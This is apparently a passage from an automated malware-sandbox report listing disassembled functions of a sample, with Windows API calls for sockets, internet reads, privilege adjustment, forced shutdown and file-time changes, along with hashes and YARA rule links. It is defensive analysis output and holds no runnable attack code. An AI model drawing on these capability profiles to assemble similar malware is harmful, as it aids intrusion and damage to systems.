                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                    • String ID:
                                                    • API String ID: 3691860299-0
                                                    • Opcode ID: 5d1fe8a4635e128a74f0c8e82f32975619c06a746b04d3f1dc2f336c7de6c2a3
                                                    • Instruction ID: 24089e51a9c7d535c84201004b44565e1f28e5c83f424140204f39134c7a069d
                                                    • Opcode Fuzzy Hash: 5d1fe8a4635e128a74f0c8e82f32975619c06a746b04d3f1dc2f336c7de6c2a3
                                                    • Instruction Fuzzy Hash: 99A1A071C0024DAEDF169FA9D881BBEBBB8BF45710F15052AF210BB2A1DB748D41CB24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436A5A, Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00436AB1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436ADA
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00436B13
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436B20
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00436B34
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 3fb8e684e4c8bb742b288a6ef007117fbf085aa73725d1216db3230eec82aea4
                                                    • Instruction ID: 70a0f61e0369552631f868ed62cd612611f7b289ef8b693fd037ad9910c85528
                                                    • Opcode Fuzzy Hash: 3fb8e684e4c8bb742b288a6ef007117fbf085aa73725d1216db3230eec82aea4
                                                    • Instruction Fuzzy Hash: 2241B375600610AFEB11BF24DC86F6E77A89B09720F06805EF91AEF3C2DB74AD018795
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004455FD, Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 99d5c000b723a9cabbe1cb7ed41102a0923a35afc3808caa3c13a2511be507f0
                                                    • Instruction ID: 06480aa859dace297aadbd9c49872a12b6c47d86634187722f97a5a3f472233f
                                                    • Opcode Fuzzy Hash: 99d5c000b723a9cabbe1cb7ed41102a0923a35afc3808caa3c13a2511be507f0
                                                    • Instruction Fuzzy Hash: 3911B2353009106FEB212F26DC45B2FB798EF55721B42403AF80AD7252CB78AD028AAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C602, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0042C69D
                                                    • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042C6B5
                                                    • CoUninitialize.OLE32 ref: 0042C922
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 948891078-24824748
                                                    • Opcode ID: 492f421c26c72c69a0a7d29f5362980467348a6aa76f7d55a0fbe01aa1448681
                                                    • Instruction ID: 2a3195b49012d5feb0efd8e9944eb0a099b25d3129191f3e0e7319732f44a05d
                                                    • Opcode Fuzzy Hash: 492f421c26c72c69a0a7d29f5362980467348a6aa76f7d55a0fbe01aa1448681
                                                    • Instruction Fuzzy Hash: 72A11871108205AFD301EF54C885FABB7E8EF95704F00496DF556DB1A2EB70AE49CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D44B6, Relevance: 7.1, Strings: 5, Instructions: 817COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Oa=$VUUU$VUUU$VUUU$VUUU
                                                    • API String ID: 0-3026953777
                                                    • Opcode ID: d7004cd4063938dbc4cf915b1ff0754398969bad72fd997f3eb0a0ac9ab2a369
                                                    • Instruction ID: 642691038c63d8930636e9263cd4f46344aca1aefe9f98ccfb28d89f19bf191c
                                                    • Opcode Fuzzy Hash: d7004cd4063938dbc4cf915b1ff0754398969bad72fd997f3eb0a0ac9ab2a369
                                                    • Instruction Fuzzy Hash: 01629E71E0411ACBCF29CF58D9907AEB3B1AF51304F2581ABD85AB7780E734AE81DB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042545F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00418CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                      • Part of subcall function 00418CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                      • Part of subcall function 00418CC3: GetLastError.KERNEL32 ref: 00418D47
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0042549B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2234035333-3733053543
                                                    • Opcode ID: 8f9aac4aa79f2a06f4cbc26f5163acbe278cf29bb798a6673bf1e9d0d09cbfa5
                                                    • Instruction ID: c1e372983c4700dd9801547a2fac3aa486a467a2465d9c71078b34865a75502c
                                                    • Opcode Fuzzy Hash: 8f9aac4aa79f2a06f4cbc26f5163acbe278cf29bb798a6673bf1e9d0d09cbfa5
                                                    • Instruction Fuzzy Hash: DD01D272355A253DF6287664BC4AFFBB72CEB01363FA00427F806D00C2D569188081AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043C304, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00401D88,?), ref: 0043C312
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043C324
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 5a4dc7d1fa5f9ed58ae4f85198771b78a3a1ba3a1924cb8dbbb63efa9f75688a
                                                    • Instruction ID: 070a20d092311d02ac2c0ac9ea37a3ed7ee20b0336b6cfe06a524fe9f59f22d8
                                                    • Opcode Fuzzy Hash: 5a4dc7d1fa5f9ed58ae4f85198771b78a3a1ba3a1924cb8dbbb63efa9f75688a
                                                    • Instruction Fuzzy Hash: 5FE08CB8200703CEDB205F25D848B9BBAD4EF0D355F90C43AE889D1610E338E844CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F9D05, Relevance: 5.9, Strings: 4, Instructions: 914COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 0-2761157908
                                                    • Opcode ID: dffccdb607b34a191a0fe4b56cad457843b0f93aaa388e2f3352f195ec557026
                                                    • Instruction ID: 88b565f29de650776d70a509658444c59ba6826edd2a646e9a4b54ca4799ccb0
                                                    • Opcode Fuzzy Hash: dffccdb607b34a191a0fe4b56cad457843b0f93aaa388e2f3352f195ec557026
                                                    • Instruction Fuzzy Hash: 83626BB6E0061E8FDB25CFA8C8406BDBBB5FF58310F26812AD949EB341D7749942CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004325E2, Relevance: 4.7, APIs: 3, Instructions: 175networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 004326D5
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0043270C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: e0dc0e4914a176aa9fc54fa3a600c49c8edabc8969c3fb64f334d7a96c09947d
                                                    • Instruction ID: e86b0893cfaadfbd345405e452c2e2e169ad2694946ff4c283b091629f40e40b
                                                    • Opcode Fuzzy Hash: e0dc0e4914a176aa9fc54fa3a600c49c8edabc8969c3fb64f334d7a96c09947d
                                                    • Instruction Fuzzy Hash: 6041F876500209BFEB219B95DE86EFF77BCFF48368F10502BF201A5140D7B99E419668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042BF27, Relevance: 4.6, APIs: 3, Instructions: 143fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042BF51
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0042BFA7
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0042BFD7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 692ec0c438157e7c2c12e46f81676904744cd6d27c2ef367ecaf030c6d1591e5
                                                    • Instruction ID: 0f442c5f246a324d36e7aaa3c6c0d5f946e3993beeb929cd63a704fca7e33b4c
                                                    • Opcode Fuzzy Hash: 692ec0c438157e7c2c12e46f81676904744cd6d27c2ef367ecaf030c6d1591e5
                                                    • Instruction Fuzzy Hash: 4B51AA35604622CFC714DF68D890EAAB3E4EF09320F51466EE95ACB3A1DB34ED05CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042B59E, Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0042B5AE
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042B608
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042B655
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 6d30b508437889f3b90437896a7510081b590facf1fa06bb63f9066f1ddeb000
                                                    • Instruction ID: baa475a67986a17f4289de25f9a6685493a9b3b201ddc69624dcc89f0574daea
                                                    • Opcode Fuzzy Hash: 6d30b508437889f3b90437896a7510081b590facf1fa06bb63f9066f1ddeb000
                                                    • Instruction Fuzzy Hash: 3C218E35A00518EFCB00EF65D884EAEBBB8FF49310F0580AAE805EB351CB31AD55CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418CC3, Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                    • GetLastError.KERNEL32 ref: 00418D47
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                    • String ID:
                                                    • API String ID: 4244140340-0
                                                    • Opcode ID: 5dc32a1ff16ef603dee56b768e80dc2f453114d684ab5c549b91bbb998b60c7a
                                                    • Instruction ID: 69ad3ab947fb5c5746c53e4b4f7773ab80df30c21f0cc6dcf5ee692af4a1ec79
                                                    • Opcode Fuzzy Hash: 5dc32a1ff16ef603dee56b768e80dc2f453114d684ab5c549b91bbb998b60c7a
                                                    • Instruction Fuzzy Hash: 8911C1B2514309BFE728DF55EC86DABBBBCEB41360710852EF04696641DB31B881CA34
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424021, Relevance: 4.6, APIs: 3, Instructions: 65fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000,00000000,?,0044FAC0,?,\\.\,0044F910), ref: 0042404B
                                                    • DeviceIoControl.KERNEL32 ref: 00424088
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424091
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: a609354ae87eb5542f919b641263b3cd3092e6ff7b320ac011069a1124a9187e
                                                    • Instruction ID: 6851aab4001bca241d10ac467614850652a6b1fbd32df005198efbaa4f69103f
                                                    • Opcode Fuzzy Hash: a609354ae87eb5542f919b641263b3cd3092e6ff7b320ac011069a1124a9187e
                                                    • Instruction Fuzzy Hash: F51182B2A00238BEE7109BE8EC44FBFBBBCDB45764F100157FA04E6190C2795D4587A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004245C1, Relevance: 4.5, APIs: 3, Instructions: 46filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74B5F8A0,00000000,00000000,?,0042F3C6,?), ref: 004245DC
                                                    • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,0042F3C6,?), ref: 00424604
                                                    • CloseHandle.KERNEL32(00000000,?,0042F3C6,?), ref: 0042460B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 370079f8198e46089e6ddcab000747a7e4fe64c2f331fe1288aff6d36dac2082
                                                    • Instruction ID: 7f444a059210e33265e4877fc35cfcdda5bfb3187113c0e9749b6e8b4ade3733
                                                    • Opcode Fuzzy Hash: 370079f8198e46089e6ddcab000747a7e4fe64c2f331fe1288aff6d36dac2082
                                                    • Instruction Fuzzy Hash: 8CF05EB5204129BAF9201A55BCC8EB72B6CEBC37ADF504137F61554080816A0D8A9679
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424C03, Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,?,?,?,?,?,?,?), ref: 00424C2C
                                                    • CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,?,?,?,?), ref: 00424C43
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00424C53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 139de2df8180d064c5a86ce1a38b911b9830103fe4650729160053fc3d22ee91
                                                    • Instruction ID: cc69ed9c6a8bfef9c4e56b50c4f458e24979712ee4933f053885909acc3091cc
                                                    • Opcode Fuzzy Hash: 139de2df8180d064c5a86ce1a38b911b9830103fe4650729160053fc3d22ee91
                                                    • Instruction Fuzzy Hash: 16F04975A5120CBBDF04CFF4ED89EBEBBBCEB49251F00447AE502E2181D6756A088B14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C93C, Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0042C966
                                                    • FindClose.KERNEL32(00000000), ref: 0042C996
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: fe72dcdf0828880a8f1eeb8b8e7f9d06980bf10cd4f46d74d5eac09fe99c8a58
                                                    • Instruction ID: 9bb8c43c10a4300acc5ec8c2b538c3392c194e25b06cd2a4d9a63aa6fabf105f
                                                    • Opcode Fuzzy Hash: fe72dcdf0828880a8f1eeb8b8e7f9d06980bf10cd4f46d74d5eac09fe99c8a58
                                                    • Instruction Fuzzy Hash: B211A1766006109FD710EF29D849E2AF7E9FF85324F01851EF8A9DB291DB74AC05CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A2D5, Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0043977D,?,00000000,?,00000016,?,00000016), ref: 0042A302
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0043977D,?,00000000,?,00000016,?,00000016), ref: 0042A314
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 4701063ffb6576ba01815b53b5c18ebc8800374edf3db1f5336fb5dea52f1d2b
                                                    • Instruction ID: 3c0c97d0011a5aa2711b8c2707fa1fe341e4b01eb60ad82b6d63c42afb0a128e
                                                    • Opcode Fuzzy Hash: 4701063ffb6576ba01815b53b5c18ebc8800374edf3db1f5336fb5dea52f1d2b
                                                    • Instruction Fuzzy Hash: 7BF0E23524422DFBDB119FA0DC48FFA7B2CFF0A3A1F008266F90896180C6319904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418713, Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00418AEE), ref: 00418728
                                                    • CloseHandle.KERNEL32(?,00000000,00418AEE), ref: 0041873A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 3b3e405732a122a5cea87cc1dd7511e5bc214fa3c7396ef36cc21e2c528559d5
                                                    • Instruction ID: 6eca260d919a7b4fdc7626ceed49c47aab2b5f36f4e8b35b939c3392bf08937c
                                                    • Opcode Fuzzy Hash: 3b3e405732a122a5cea87cc1dd7511e5bc214fa3c7396ef36cc21e2c528559d5
                                                    • Instruction Fuzzy Hash: D4E0EC76010650EFE7662B61ED09D77BBE9EF04750724893DF896848B0DB72ACD0DB14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EA395, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003E8F97,?,?,?,00000001), ref: 003EA39A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003EA3A3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
